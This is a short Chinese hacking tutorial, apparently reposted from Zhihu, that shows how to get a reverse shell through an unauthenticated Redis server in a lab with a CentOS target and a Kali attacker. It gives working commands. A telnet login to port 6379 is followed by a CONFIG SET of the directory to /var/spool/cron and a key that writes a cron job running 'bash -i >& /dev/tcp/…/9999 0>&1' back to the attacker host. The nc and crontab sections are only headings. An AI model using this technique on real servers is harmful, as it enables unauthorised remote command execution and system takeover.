Redis未授权访问之反弹shell

congtou 2017-1-25 黑客入侵 0 7

靶机:centos6.5

公鸡:Kali

一、crontab基础姿势

Crontab定时任务配置 - 潇湘隐者 - 博客园

二、redis未授权登录服务器

1、telnet登录/也可以redis-cli登录

telnet 192.168.236.130 6379 //未授权登录

config set dir /var/spool/cron/ //配置文件夹的路径(CONFIG SET 命令可以动态地调整 Redis 服务器的配置而(configuration)而无须重启。)//每个用户生成的crontab文件,都会放在 /var/spool/cron/ 目录下面

set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.236.129/9999 0>&1\n\n\n" //直接往当前用户的crontab里写入反弹shell,换行是必不可少的。

三、nc反弹

四、Centos里面查看crontab任务。

作者:呵呵呵呵呵呵
链接:https://zhuanlan.zhihu.com/p/25015624
来源:知乎
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

转载请注明来自华盟网,本文标题:《Redis未授权访问之反弹shell》

喜欢 (7) 发布评论